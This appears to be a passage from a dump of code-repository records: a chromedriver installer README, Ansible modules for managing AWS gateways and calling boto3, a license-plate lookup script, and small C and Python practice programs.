System :: Installation/Setup\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"License :: OSI Approved :: MIT License\",\n ],\n cmdclass={'build_py': DownloadChromedriver}\n)\n" }, { "alpha_fraction": 0.7711682915687561, "alphanum_fraction": 0.7759914398193359, "avg_line_length": 32.32143020629883, "blob_id": "b69903d451fdddacf2f41ed3c57921cccf55f409", "content_id": "429cc6027dcf7b04a5fa1597356de27df7873f74", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1866, "license_type": "permissive", "max_line_length": 225, "num_lines": 56, "path": "/README.md", "repo_name": "xuanhien091/python-chromedriver-binary", "src_encoding": "UTF-8", "text": "# chromedriver-binary\nDownloads and installs the [chromedriver](https://sites.google.com/a/chromium.org/chromedriver/) binary version 92.0.4515.43 for automated testing of webapps. The installer supports Linux, MacOS and Windows operating systems.\n\nAlternatively the package [chromedriver-binary-auto](https://pypi.org/project/chromedriver-binary-auto/) can be used to automatically detect the latest chromedriver version required for the installed Chrome/Chromium browser.\n\n## Installation\n\n### Latest and fixed versions\n\n#### From PyPI\n```\npip install chromedriver-binary\n```\n\n#### From GitHub\n```\npip install git+https://github.com/danielkaiser/python-chromedriver-binary.git\n```\n\n### Automatically detected versions\n\nPlease make sure to install Chrome or Chromium first and add the browser to the binary search path.\n\n#### From PyPI\n```\npip install chromedriver-binary-auto\n```\n\nTo redetect the required version and install the newest suitable chromedriver after the first installation simply reinstall the package using\n```\npip install --upgrade --force-reinstall chromedriver-binary-auto\n```\n\n#### From GitHub\n```\npip install git+https://github.com/danielkaiser/python-chromedriver-binary.git@chromedriver-binary-auto\n```\n\n## Usage\nTo use chromedriver just `import chromedriver_binary`. This will add the executable to your PATH so it will be found. You can also get the absolute filename of the binary with `chromedriver_binary.chromedriver_filename`.\n\n### Example\n```\nfrom selenium import webdriver\nimport chromedriver_binary # Adds chromedriver binary to path\n\ndriver = webdriver.Chrome()\ndriver.get(\"http://www.python.org\")\nassert \"Python\" in driver.title\n```\n\n### Exporting chromedriver binary path\nThis package installs a small shell script `chromedriver-path` to easily set and export the PATH variable:\n```\n$ export PATH=$PATH:`chromedriver-path`\n```\n" } ]
2
shepdelacreme/ansible-custom-modules
https://github.com/shepdelacreme/ansible-custom-modules
cb813c748584d2363f67ad3742271cb8177acbaf
6d3f5e521f59cbbd8967aa455d8b53bec03dfa35
6bfff10f2158a4da28acc403e684b4ab08324caa
refs/heads/master
2021-01-20T04:02:03.818304
2017-05-31T13:53:43
2017-05-31T13:53:43
89,624,403
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.656095564365387, "alphanum_fraction": 0.6628226041793823, "avg_line_length": 33.037384033203125, "blob_id": "b0dfbbc24f92cb609bbe3a63547858db5b67cadf", "content_id": "38fec0bf4b75603f36975b68cf960a3cd0cf6119", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7284, "license_type": "no_license", "max_line_length": 151, "num_lines": 214, "path": "/library/ec2_vpc_eigw.py", "repo_name": "shepdelacreme/ansible-custom-modules", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n#\n# This is a free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This Ansible library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this library. If not, see <http://www.gnu.org/licenses/>.\n\nANSIBLE_METADATA = {'metadata_version': '1.0',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\n\nDOCUMENTATION = '''\n---\nmodule: ec2_vpc_eigw\nshort_description: Manage an AWS VPC Egress Only Internet gateway\ndescription:\n - Manage an AWS VPC Egress Only Internet gateway\nversion_added: \"2.4\"\nauthor: Daniel Shepherd (@shepdelacreme)\noptions:\n vpc_id:\n description:\n - The VPC ID for the VPC that this Egress Only Internet Gateway should be attached.\n required: true\n state:\n description:\n - Create or delete the EIGW\n default: present\n choices: [ 'present', 'absent' ]\nextends_documentation_fragment:\n - aws\n - ec2\n'''\n\nEXAMPLES = '''\n# Note: These examples do not set authentication details, see the AWS Guide for details.\n\n# Ensure that the VPC has an Internet Gateway.\n# The Internet Gateway ID is can be accessed via {{eigw.gateway_id}} for use in setting up NATs etc.\nec2_vpc_eigw:\n vpc_id: vpc-abcdefgh\n state: present\nregister: eigw\n\n'''\n\nRETURN = '''\ngateway_id:\n description: The ID of the Egress Only Internet Gateway\n returned: success\n type: string\n sample: eigw-0e00cf111ba5bc11e\n'''\n\n\nimport traceback\nfrom time import sleep\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils.ec2 import (\n boto3_conn,\n ec2_argument_spec,\n get_aws_connection_info,\n AWSRetry,\n HAS_BOTO3,\n boto3_tag_list_to_ansible_dict,\n camel_dict_to_snake_dict,\n ansible_dict_to_boto3_filter_list\n)\nfrom botocore.exceptions import ClientError\n\n\[email protected]()\ndef delete_eigw(module, client, eigw_id):\n \"\"\"\n Delete EIGW\n\n module : AnsibleModule object\n client : boto3 client connection object\n eigw_id : ID of the EIGW to delete\n \"\"\"\n\n try:\n response = client.delete_egress_only_internet_gateway(DryRun=module.check_mode, EgressOnlyInternetGatewayId=eigw_id)\n except ClientError as err:\n # When boto3 method is run with DryRun=True it returns an error on success\n # We need to catch the error and return something valid\n if err.response.get('Error').get('Code') == \"DryRunOperation\":\n return {'changed': True, 'gateway_id': None}\n else:\n module.fail_json(msg=err.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(err.response))\n\n return {'changed': response['ReturnCode']}\n\n\[email protected]()\ndef 
create_eigw(module, client, vpc_id):\n \"\"\"\n Create EIGW\n\n module : AnsibleModule object\n client : boto3 client connection object\n vpc_id : ID of the VPC we are operating on\n \"\"\"\n\n try:\n response = client.create_egress_only_internet_gateway(DryRun=module.check_mode, VpcId=vpc_id)\n eigw = response['EgressOnlyInternetGateway']\n except ClientError as err:\n # When boto3 method is run with DryRun=True it returns an error on success\n # We need to catch the error and return something valid\n if err.response.get('Error').get('Code') == \"DryRunOperation\":\n return {'changed': True, 'gateway_id': None}\n else:\n module.fail_json(msg=err.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(err.response))\n\n # We loop through the Attachments list in boto3 response to make sure the EIGW is fully attached before returning\n state = eigw['Attachments'][0]['State']\n if state == 'attached':\n # EIGW is fully attached so we return immediately\n return {'changed': True, 'gateway_id': eigw['EgressOnlyInternetGatewayId']}\n elif state == 'attaching':\n # EIGW is still attaching so we check status\n retries = 5\n pause = 1\n while retries > 0:\n retries = retries - 1\n sleep(pause)\n try:\n check_resp = client.describe_egress_only_internet_gateways(EgressOnlyInternetGatewayIds=eigw['EgressOnlyInternetGatewayId'])\n except ClientError as err:\n module.fail_json(msg=err.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(err.response))\n\n if check_resp['EgressOnlyInternetGateways'][0]['Attachments'][0]['State'] == 'attached':\n return {'changed': True, 'gateway_id': eigw['EgressOnlyInternetGatewayId']}\n pause = pause * 2\n else:\n # EIGW gave back a bad attachment state so we error out\n module.fail_json(msg='Unable to create and attach Egress Only Internet Gateway to VPCId: {0}. 
Bad Attachment State: {1}'.format(vpc_id, state))\n\n\[email protected]()\ndef describe_eigws(module, client, vpc_id):\n \"\"\"\n Describe EIGWS\n\n module : AnsibleModule object\n client : boto3 client connection object\n vpc_id : ID of the VPC we are operating on\n \"\"\"\n\n try:\n response = client.describe_egress_only_internet_gateways()\n except ClientError as err:\n module.fail_json(msg=err.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(err.response))\n\n if len(response['EgressOnlyInternetGateways']) == 0:\n return None\n\n for eigw in response['EgressOnlyInternetGateways']:\n attached_vpc = eigw['Attachments'][0]['VpcId']\n state = eigw['Attachments'][0]['State']\n if attached_vpc == vpc_id and state in ('attached', 'attaching'):\n return eigw['EgressOnlyInternetGatewayId']\n else:\n return None\n\n\ndef main():\n argument_spec = ec2_argument_spec()\n argument_spec.update(dict(\n vpc_id=dict(required=True),\n state=dict(default='present', choices=['present', 'absent'])\n ))\n\n module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)\n\n if not HAS_BOTO3:\n module.fail_json(msg='boto3 is required for this module')\n\n try:\n region, ec2_url, aws_connect_params = get_aws_connection_info(module, boto3=True)\n client = boto3_conn(module, conn_type='client', resource='ec2', **aws_connect_params)\n except ClientError as err:\n module.fail_json(msg=err.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(err.response))\n\n vpc_id = module.params.get('vpc_id')\n state = module.params.get('state')\n\n eigw_id = describe_eigws(module, client, vpc_id)\n\n result = dict(\n changed=False,\n gateway_id=eigw_id\n )\n\n if state == 'present' and not eigw_id:\n result = create_eigw(module, client, vpc_id)\n elif state == 'absent' and eigw_id:\n result = delete_eigw(module, client, eigw_id)\n\n module.exit_json(**result)\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.8309859037399292, "alphanum_fraction": 0.8309859037399292, "avg_line_length": 34.5, "blob_id": "d636d800027ea742919479665153238f7193bbad", "content_id": "22d6a6a6ed11ac1e60dbf9928524c443fa7e1863", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 71, "license_type": "no_license", "max_line_length": 45, "num_lines": 2, "path": "/README.md", "repo_name": "shepdelacreme/ansible-custom-modules", "src_encoding": "UTF-8", "text": "# ansible-custom-modules\nCustom modules developed for use with Ansible\n" }, { "alpha_fraction": 0.6412017941474915, "alphanum_fraction": 0.653313159942627, "avg_line_length": 33.48594284057617, "blob_id": "bfa4c1c2cbb262e2a4e3d3304e3d4c7af9c7109c", "content_id": "7aa87c4889e1d31f2326a904afe3ac0cd6eb8422", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8587, "license_type": "no_license", "max_line_length": 158, "num_lines": 249, "path": "/library/boto3_generic.py", "repo_name": "shepdelacreme/ansible-custom-modules", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n#\n# This is a free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This Ansible library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this library. If not, see <http://www.gnu.org/licenses/>.\n\nANSIBLE_METADATA = {'metadata_version': '1.0',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\n\nDOCUMENTATION = '''\n---\nmodule: boto3_generic\nshort_description: Generic interface to boto3\ndescription:\n - Manage an AWS VPC Egress Only Internet gateway\nversion_added: \"2.4\"\nauthor:\n - \"Daniel Shepherd (@shepdelacreme)\"\nrequirements:\n - boto3\n - botocore\noptions:\n service:\n description:\n - The AWS service you want to access with boto3. The service name must match the definitions in the boto3 docs.\n - Example ec2, s3, cloudtrail, etc\n - See U(http://boto3.readthedocs.io/en/latest/reference/services/index.html)\n required: true\n conn_type:\n description:\n - The type of boto3 connection to create.\n - boto3 provides a low-level 'client' interface as well as a higher level 'resource' interface that abstracts some functionality.\n default: client\n choices: [ 'client', 'resource' ]\n operation_name:\n description:\n - The method or name of the operation of the boto3 client/resource to use. This needs to be specified as documented in the boto3 docs or the AWS CLI/API\n - Both the Camel Case and Snake Case version of the name is accepted here.\n - See U(http://boto3.readthedocs.io/en/latest/reference/services/index.html)\n required: true\n arguments:\n description:\n - Complex arguments to pass to the boto3 service method specified above.\n aliases: args\nextends_documentation_fragment:\n - aws\n'''\n\nEXAMPLES = '''\n# Note: These examples do not set authentication details, see the AWS Guide for details.\n\n# Grab info for all VPCs and register output for later consumption\nboto3_generic:\n service: ec2\n conn_type: client\n operation_name: describe_vpcs\n args:\n VpcIds: vpc-83cce1e6\nregister: vpcs\n\n'''\n\nRETURN = '''\nresponse:\n description: The response from boto3 converted to snake dict.\n returned: always\n type: complex\n sample: hash/dictionary returned by boto3 low-level client\n contains:\n response_metadata:\n description: hash/dictionary with the parsed HTTP response\n returned: always\n type: dict\n contains:\n http_headers:\n description: HTTP headers from the response parsed out\n type: dict\n contains:\n content_type:\n description: HTTP content-type\n returned: always\n sample: \"text/html;charset=UTF-8\"\n date:\n description: Date of request\n returned: always\n sample: \"Tue, 25 Apr 2017 17:40:43 GMT\"\n server:\n description: HTTP server type\n returned: always\n sample: \"AmazonEC2\"\n transer-encoding:\n description: Transer encoding header\n returned: always\n sample: \"chunked\"\n vary:\n description: don't know\n returned: always\n sample: \"Accept-Encoding\"\n http_status_code:\n description: The HTTP status code of the response\n returned: always\n sample: 200\n request_id:\n description: The unique request id assigned to the request\n returned: always\n sample: c646d2d2-29e0-11e7-93ae-92361f002671\n retry_attemps:\n description: The number of times the request was retried\n returned: always\n sample: 0\n other:\n description: This is a boto3 operation specific object that is returned. 
Consult the boto3 documentation for the operation being invoked.\n - The name will not be \"other\" and is specific to the operation.\n - This is typically a list of dicts or a single dict.\n returned: sometimes\n sample: This is a complex type, usually a list of dicts or a dict.\n'''\n\n\nimport traceback\nimport re\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils.ec2 import (\n boto3_conn,\n ec2_argument_spec,\n get_aws_connection_info,\n AWSRetry,\n HAS_BOTO3,\n boto3_tag_list_to_ansible_dict,\n camel_dict_to_snake_dict,\n ansible_dict_to_boto3_filter_list\n)\nfrom botocore.session import Session\nfrom botocore.exceptions import ClientError\n\n\ndef camel_to_snake(name):\n\n first_cap_re = re.compile('(.)([A-Z][a-z]+)')\n all_cap_re = re.compile('([a-z0-9])([A-Z])')\n s1 = first_cap_re.sub(r'\\1_\\2', name)\n\n return all_cap_re.sub(r'\\1_\\2', s1).lower()\n\n\ndef call_boto3_operation(module, conn, operation_name, args):\n\n try:\n boto3_call = getattr(conn, operation_name)\n response = camel_dict_to_snake_dict(boto3_call(**args))\n except ClientError as err:\n # When boto3 method is run with DryRun=True it returns an error on success\n # We need to catch the error and return something valid\n if err.response.get('Error').get('Code') == \"DryRunOperation\":\n return {'changed': True}\n else:\n return camel_dict_to_snake_dict(err.response)\n\n return response\n\n\ndef validate_params(module, service, operation_name, args, **awsparams):\n profile = awsparams.get('profile_name')\n\n session = Session(profile=profile)\n\n if service not in session.get_available_services():\n module.fail_json(msg='Invalid Service Name: {0}'.format(service))\n\n service_model = session.get_service_model(service)\n op_names = list(service_model.operation_names)\n if operation_name not in op_names:\n module.fail_json(msg='Invalid Operation Name: {0} for Service: {1}'.format(operation_name, service))\n\n op_model = service_model.operation_model(operation_name)\n shape_members = dict(op_model.input_shape.members)\n required_members = list(op_model.input_shape.required_members)\n\n if 'DryRun' not in shape_members:\n args.pop('DryRun')\n\n bad_params = set(args.keys()) - set(shape_members.keys())\n if bad_params:\n module.fail_json(msg='Invalid Argument(s): {0} for Service Operation: {1}'.format(\", \".join(bad_params), operation_name))\n\n missing_params = set(required_members) - set(args.keys())\n if missing_params:\n module.fail_json(msg='Missing Required Argument(s): {0} for Service Operation: {1}'.format(\", \".join(missing_params), operation_name))\n\n return args\n\n\ndef main():\n argument_spec = ec2_argument_spec()\n argument_spec.update(dict(\n arguments=dict(aliases=['args'], default=dict(), type='dict'),\n service=dict(required=True),\n conn_type=dict(default='client', choices=['client', 'resource']),\n operation_name=dict(required=True)\n ))\n\n module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)\n\n if not HAS_BOTO3:\n module.fail_json(msg='boto3 is required for this module')\n\n if isinstance(module.params['arguments'], dict):\n args = module.params['arguments']\n else:\n args = dict()\n\n service = module.params['service']\n conn_type = module.params['conn_type']\n operation_name = module.params['operation_name']\n\n args['DryRun'] = module.check_mode\n\n if args.get('Filters'):\n args['Filters'] = ansible_dict_to_boto3_filter_list(args['Filters'])\n\n result = dict(\n changed=False\n )\n\n try:\n region, ec2_url, aws_connect_params = 
get_aws_connection_info(module, boto3=True)\n args = validate_params(module, service, operation_name, args, **aws_connect_params)\n conn = boto3_conn(module, conn_type=conn_type, resource=service, **aws_connect_params)\n except ClientError as err:\n module.fail_json(msg=err.message, exception=traceback.format_exc(), **camel_dict_to_snake_dict(err.response))\n\n result['response'] = call_boto3_operation(module, conn, camel_to_snake(operation_name), args)\n\n module.exit_json(**result)\n\n\nif __name__ == '__main__':\n main()\n" } ]
3
SaleelS/parkcam
https://github.com/SaleelS/parkcam
0dfc96719a88aeb31e145bd35c9dacd6f87065ae
24bcd691b4023f3ef5c3def99a69756f38bff62b
d774a6e5bfa7b22e6b7b024356937f6434212ed1
refs/heads/master
2021-01-19T00:12:37.650525
2015-08-07T01:53:21
2015-08-07T01:53:21
40,335,492
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5514354109764099, "alphanum_fraction": 0.559808611869812, "avg_line_length": 25.410526275634766, "blob_id": "ab885ac11b53752f370b1858b9b2c3d8901d32fb", "content_id": "419c0a72b5ae724a9f29042c904dba0affd361d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2508, "license_type": "no_license", "max_line_length": 68, "num_lines": 95, "path": "/parking.py", "repo_name": "SaleelS/parkcam", "src_encoding": "UTF-8", "text": "import gspread\nfrom difflib import SequenceMatcher\nimport subprocess\nimport json\nimport sys\nimport shlex\nfrom openpyxl import load_workbook\n\nclass PlateReader:\n #@param carImage is a filename string\n #DONT UNFOLD contains pw lol\n def __init__(self):\n self.gdoc = self.getGdoc()\n def alpr_subprocess(self):\n alpr_args = shlex.split(self.alpr_command_args)\n return subprocess.Popen(alpr_args, stdout = subprocess.PIPE)\n\n def alpr_json_results(self):\n alpr_out, alpr_error = self.alpr_subprocess().communicate()\n\n if not alpr_error is None:\n return None, alpr_error\n elif \"No license plates found.\" in alpr_out:\n return None, None\n\n try:\n return json.loads(alpr_out), None\n except ValueError, e:\n return None, e\n\n\n def read_plate(self,image):\n self.alpr_command_args = \"alpr -j \" + image\n alpr_json, alpr_error = self.alpr_json_results()\n\n if not alpr_error is None:\n print alpr_error\n return\n\n if alpr_json is None:\n print \"No results!\"\n return\n\n results = alpr_json[\"results\"][0]\n return results['plate']\n\n def getGdoc(self):\n \"\"\"\n parkerC = gspread.Client(self.auth)\n parkerC.login()\n parkerS = parkerC.open_by_key(\"18pus8l5KnrdThVcTrylR3Zvj1Pmgs8L8QocJACImFTU\")\n parker = parkerS.get_worksheet(0)\n return parker\n \"\"\"\n wb = load_workbook('parking.xlsx')\n return wb.get_sheet_by_name(\"Sheet1\")\n\n def getRowbyPlate(self,plate):\n parker = self.gdoc\n plates = [a[0].value for a in parker[\"D2:D257\"]]\n names = [a[0].value for a in parker[\"A2:A257\"]]\n #print plates\n maxMatch = 0\n matchIdx = -1\n for i in range(len(plates)):\n if plates[i] is None:\n continue\n matcher = SequenceMatcher(None,plates[i],plate)\n mp = matcher.ratio()\n if mp > maxMatch:\n matchIdx = i\n maxMatch = mp\n if maxMatch > 0.5:\n print matchIdx\n return names[matchIdx]\n else:\n return None\n\ndef __main__():\n args = sys.argv[1:]\n if len(sys.argv) != 2:\n print(\"please enter an image to process\")\n exit(1)\n else:\n pr = PlateReader()\n plate = pr.read_plate(args[0])\n print(pr.getRowbyPlate(plate))\n\n\n\ndef readPlate(carImageFile):\n subprocess\n\nif __name__ == \"__main__\":\n __main__()" } ]
1
kowshid/Practice-Problems
https://github.com/kowshid/Practice-Problems
f494d7db3c4c7814d8d376bc166938444b777f0a
7079ac4186a406261bb71be5a6b356da70f3c283
7f2910c60fb168780984d4d3f720fbb318446faf
refs/heads/master
2023-04-05T20:15:27.264497
2021-03-10T05:29:32
2021-03-10T05:29:32
315,970,738
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.3262679874897003, "alphanum_fraction": 0.3451930284500122, "avg_line_length": 18.71641731262207, "blob_id": "5ca8ef2696d4366b6a7f43507c0045fc06e1d50c", "content_id": "508672d997902a3825e9597a1bf7f8c737fb5d19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1321, "license_type": "no_license", "max_line_length": 50, "num_lines": 67, "path": "/Word reversals of a given string.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "/*\n Input: 2T lines:\n a string str\n Output:\n print each word of the string in reverse order\n*/\n\n#include <stdio.h>\n#include <string.h>\n\nvoid printReverse(char str[])\n{\n int len = strlen(str) - 1;\n for(int i = len; i >= 0; i--)\n printf(\"%c\", str[i]);\n printf(\" \");\n}\n\nint main()\n{\n FILE *fptr; //file pointer to read from file\n fptr = (fopen(\"D:\\\\input.txt\", \"r\"));\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n int T, len, j;\n char str[1001], word[1001];\n fscanf(fptr, \"%d\", &T);\n\n if(T > 0 && T <= 100)\n {\n for(int k = 0; k < T; k++)\n {\n j = 0;\n fscanf(fptr, \" %[^\\n]\", str);\n //printf(\"%s\\n\", str);\n len = strlen(str);\n\n for(int i = 0; str[i]; i++)\n {\n if(str[i] != ' ')\n {\n word[j] = str[i];\n j++;\n }\n else if(j > 0)\n {\n word[j] = '\\0';\n printReverse(word);\n j = 0;\n }\n }\n if(j > 0)\n {\n word[j] = '\\0';\n printReverse(word);\n }\n\n printf(\"\\n\");\n }\n }\n\n return 0;\n}\n" }, { "alpha_fraction": 0.3506825864315033, "alphanum_fraction": 0.3831058144569397, "avg_line_length": 16.477611541748047, "blob_id": "e9b2745404acd2801f1081097c7086351cb7e492", "content_id": "ef089b99e51cd49e69bfd3366ee688c5bc255fb4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1172, "license_type": "no_license", "max_line_length": 56, "num_lines": 67, "path": "/prime using sieve.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "\n/*\n input:\n T lines containing low < up\n output:\n all primes in range [a, b]\n*/\n\n#include <stdio.h>\n#include <math.h>\n\nint up = 100000;\n\nint main()\n{\n FILE *fptr;\n fptr = fopen(\"D:\\\\input.txt\", \"r\");\n\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n int T, lo, hi, limit = sqrt(up), count;\n char str[10001], *temp, input[10001], output[10001];\n char delim[] = \" .,!?;:\";\n int arr[up + 1];\n\n fscanf(fptr, \"%d\", &T);\n\n if(T <= 0 || T > 100)\n {\n printf(\"Input Error!\");\n exit(1);\n }\n\n for(int i = 2; i <= up; i++)\n {\n arr[i] = 1; //1 denoted its a prime number\n }\n\n for(int i = 2; i <= limit; i++)\n {\n if(arr[i] == 1)\n {\n for(int j = 2; i*j <= up; j++)\n arr[i*j] = 0;\n }\n }\n\n for (int k = 0; k < T; k++)\n {\n count = 0;\n fscanf(fptr, \"%d%d\", &lo, &hi);\n for(int i = lo; i <= hi; i++)\n {\n if(arr[i])\n {\n count++;\n printf(\"%d \", i);\n }\n }\n printf(\"\\nTotal = %d\\n\", count);\n }\n\n return 0;\n}\n" }, { "alpha_fraction": 0.4586776793003082, "alphanum_fraction": 0.4889807105064392, "avg_line_length": 24.068965911865234, "blob_id": "cb94c59b9c03a49b1028bdc0ecf62ed9fb3731b2", "content_id": "e7a41f6c14671306251bd41c810fed0c0dbccc12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 726, "license_type": "no_license", "max_line_length": 73, "num_lines": 29, "path": "/isomorphic Strings.py", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", 
"text": "def isomorphic(str1, str2):\n len1 = len(str1)\n len2 = len(str2)\n\n if len1 != len2:\n return False\n\n visited = [False] * 26\n mapping = [-1] * 26\n\n for i in range(len1):\n if mapping[ord(str1[i]) - ord('a')] == -1:\n if visited[ord(str2[i]) - ord('a')] == True:\n return False\n\n mapping[ord(str1[i]) - ord('a')] = ord(str2[i]) - ord('a')\n visited[ord(str2[i]) - ord('a')] = True\n\n elif mapping[ord(str1[i]) - ord('a')] != ord(str2[i]) - ord('a'):\n return False\n return True\n\ndef main():\n print(\"ahsan\", \"kowshid\")\n print(isomorphic(\"ahsan\", \"waqar\"))\n print(isomorphic(\"aab\", \"xxy\"))\n\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.44606414437294006, "alphanum_fraction": 0.4693877696990967, "avg_line_length": 20.41666603088379, "blob_id": "5bcbd41d6d1757608e8720f02404b1cd1cf9f138", "content_id": "e8ee5ebc252abc3b666141ea33c07fc6fe149203", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1029, "license_type": "no_license", "max_line_length": 77, "num_lines": 48, "path": "/cricket run rate.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "//\n\n/*\n Input: T lines each having opposition runs, current runs, balls remaining\n Output:\n CRR, RRR\n*/\n\n#include <stdio.h>\n\nint main()\n{\n FILE *fptr; //file pointer to read from file\n fptr = (fopen(\"D:\\\\input.txt\", \"r\"));\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n int T;\n double target, score, ballsRemaining, CRR, RRR;\n fscanf(fptr, \"%d\", &T);\n\n if(T > 0 && T <= 100)\n {\n for(int i = 0; i < T; i++)\n {\n fscanf(fptr, \"%lf%lf%lf\", &target, &score, &ballsRemaining);\n if(target < score || ballsRemaining > 300.0)\n {\n printf(\"input error\\n\");\n continue;\n }\n\n target = target + 1.0;\n\n CRR = 6.0 * score / (300.0 - ballsRemaining);\n RRR = 6.0 * (target - score) / ballsRemaining;\n\n printf(\"Case %d: %.2lf %.2lf\\n\", i + 1, CRR, RRR);\n }\n //printed list is unsorted\n printf(\"\\n\");\n }\n\n return 0;\n}\n\n" }, { "alpha_fraction": 0.44897958636283875, "alphanum_fraction": 0.4656771719455719, "avg_line_length": 15.333333015441895, "blob_id": "0339663b8eb1dbfd2e7a3321e7656b2953f8664e", "content_id": "316e6a951e9917841b1de723d10a30c3dc6043d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 539, "license_type": "no_license", "max_line_length": 48, "num_lines": 33, "path": "/Add digits of a number.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "/*\nInput: T numbers of variable lenght\nOutput: add the RMD and LMD\n*/\n\n#include <stdio.h>\n\nint main()\n{\n FILE *fptr; //file pointer to read from file\n fptr = (fopen(\"D:\\\\input.txt\", \"r\"));\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n int T, n, num, RSD;\n fscanf(fptr, \"%d\", &T);\n\n for(int i = 0; i < T; i++)\n {\n fscanf(fptr, \"%d\", &num);\n RSD = num % 10;\n\n while(num >= 10)\n num /= 10;\n\n printf(\"%d\\n\", RSD + num);\n }\n\n return 0;\n}\n" }, { "alpha_fraction": 0.3595854938030243, "alphanum_fraction": 0.37823835015296936, "avg_line_length": 18.67346954345703, "blob_id": "bb95cd066ffa30e707283cb49231f4e129221375", "content_id": "18671d621069b6022d631f9e98dc3d106c4c0c0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 965, "license_type": "no_license", "max_line_length": 74, "num_lines": 49, "path": "/word count in a given 
string.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "/*\n Input: 2T lines:\n a string str only containing space\n Output:\n word count in str\n*/\n\n#include <stdio.h>\n#include <string.h>\n\nint main()\n{\n FILE *fptr; //file pointer to read from file\n fptr = (fopen(\"D:\\\\input.txt\", \"r\"));\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n int T, count;\n char str[1001], word[1001];\n fscanf(fptr, \"%d\", &T);\n\n if(T > 0 && T <= 100)\n {\n for(int k = 0; k < T; k++)\n {\n count = 1;\n fscanf(fptr, \" %[^\\n]\", str);\n //printf(\"%s\\n\", str);\n\n for(int i = 0; str[i]; i++)\n {\n if(str[i] == ' ')\n {\n while(str[i] == ' ') //if contains more than one space\n i++;\n count++;\n }\n }\n\n printf(\"%s --> %d\\n\", str, count);\n }\n printf(\"\\n\");\n }\n\n return 0;\n}\n\n" }, { "alpha_fraction": 0.33572283387184143, "alphanum_fraction": 0.3715651035308838, "avg_line_length": 16.39583396911621, "blob_id": "8f3e6286476e00fe3a401923d92ddbf8a22fbadb", "content_id": "5e26561ada316f9f487716b5ac807de07b663af5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 837, "license_type": "no_license", "max_line_length": 48, "num_lines": 48, "path": "/Zero count of factorial.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "\n//\n\n/*\n Input: T numbers where 0 <= n <= 100\n Output:\n zero (0) at the end\n*/\n\n#include <stdio.h>\nint arr[101];\n\nint main()\n{\n FILE *fptr; //file pointer to read from file\n fptr = (fopen(\"D:\\\\input.txt\", \"r\"));\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n int T, n, count;\n arr[0] = 0;\n for(int i = 1; i < 101; i++)\n {\n if(i % 25 == 0)\n arr[i] = 2;\n else if(i % 5 == 0)\n arr[i] = 1;\n }\n\n fscanf(fptr, \"%d\", &T);\n if(T > 0 && T <= 100)\n {\n for(int i = 0; i < T; i++)\n {\n count = 0;\n fscanf(fptr, \"%d\", &n);\n for(int j = 0; j <= n; j++)\n count += arr[j];\n\n printf(\"%d --> %d\\n\", n, count);\n }\n printf(\"\\n\");\n }\n\n return 